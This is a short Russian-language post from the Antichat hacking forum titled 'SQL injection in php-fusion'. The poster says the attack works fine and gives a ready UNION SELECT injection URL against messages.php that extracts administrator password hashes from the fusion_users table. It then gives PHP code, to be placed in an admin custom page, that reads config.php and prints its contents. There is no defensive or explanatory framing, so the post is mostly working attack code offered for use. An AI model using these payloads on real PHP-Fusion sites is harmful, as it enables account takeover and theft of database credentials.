Форум АНТИЧАТ - SQL - инъекция в php-fusion

работает отлично! :D

Код:

messages.php?folder=inbox&show=_&srch_where=+AND+1=1+UNION+SELECT+0%2C0%2C0%2Cuser_password%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+FROM+fusion_users+WHERE+user_level%3D103%2F%2A

/administration/custom_pages.php

Код:

<?php 

$DATA_FILE = "".BASEDIR."config.php"; 

$text = 100; 

$names = file($DATA_FILE); 

for ($i = count($names) - 1 - $for; $i >= count($names) - $for - $text; $i = $i - 1) { 

if ($names[$i]) { 

list ($name) = split ("\t", $names[$i]); 

print "$name<br>"; 

} 

} 

?>

короткое video тут

;)